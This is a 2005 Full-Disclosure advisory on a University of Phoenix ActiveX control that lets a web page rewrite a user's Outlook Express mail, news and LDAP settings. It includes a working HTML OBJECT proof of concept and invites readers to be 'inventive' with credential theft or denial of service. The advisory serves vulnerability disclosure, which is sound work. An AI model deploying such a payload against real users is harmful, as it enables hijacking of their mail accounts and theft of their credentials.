University of Phoenix - Outlook Express Unauthorized Configuration Manipulation

[Adam Baldwin <evilpacket () gmail com>]

 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

University of Phoenix Outlook Express Unauthorized Configuration Manipulation
Vendor Homepage: http://www.phoenix.edu

Discovered by: Adam Baldwin (evilpacket () ngenuity-is com)
www.evilpacket.net\advisories\EP-000-0002.html

Discovery Date: 1.17.2005

File Name: PhxStudent15.ocx
Vulnerable Version: 2.00.0001

Overview:
PhxStudent15.ocx is an activex control used to setup e-mail / NNTP and
LDAP accounts in Outlook Express. This control remains on the users
system long after the setup process has completed. This activex
control can be used to manipulate the users account settings (imap /
smtp / nntp / ldap).

The following is an example of how to embed this control into a
website with the proper param's. Note the account is only 'modified'
if the "Program" param remains the same, which is not difficult. Any
of the other settings can be modified to cause any number of attacks
from denial of service to theft of login credentials, (be inventive
:-)

Example:
<HTML>
<BODY>
<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4
codeBase="PhxStudent15.ocx">
     <PARAM NAME="Program" VALUE="BSIT">
     <PARAM NAME="GroupID" VALUE="BSAF008HU0">
     <PARAM NAME="CourseID" VALUE="DBM/380">
     <PARAM NAME="StartDate" VALUE="01/20/2005">
     <PARAM NAME="Path" VALUE="">
     <PARAM NAME="DNS" VALUE="bsit2.phoenix.edu">
     <PARAM NAME="Student" VALUE="Y">
     <PARAM NAME="FName" VALUE="FIRSTNAME">
     <PARAM NAME="LName" VALUE="LASTNAME">
     <PARAM NAME="Alias" VALUE="username">
     <PARAM NAME="ErrorPath" VALUE="">
     <PARAM NAME="CourseListPage" VALUE="">
     <PARAM NAME="Account2000YN" VALUE="Y">
     <PARAM NAME="NNTPUserNamePrefix" VALUE="ols\">
     <PARAM NAME="EmailSuffix" VALUE="@email.uophx.edu">
     <PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">
     <PARAM NAME="MailoutLocation" VALUE="emailout.phoenix.edu">
     <PARAM NAME="EmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="FlexnetEmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="LDAPUserName" VALUE="">
     <PARAM NAME="ProgramSuffix" VALUE="_">
</OBJECT>
</BODY>
</HTML>

Mitigation:
The University of Phoenix has been contacted but no response has been
received. I would recommend that students remove this activex control
and only allow it to be installed while registering for classes.

Notes:
At this time further exploitation does not appear possible, although
on the following platform (with modification of the params) would
crash IE after the ocx was loaded and crashed 3 times in the same
browser window, which begs further research.

Platform: Windows XP SP2, IE 6.0.2900.2180.xpsp2_rtm.040803-2158 

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html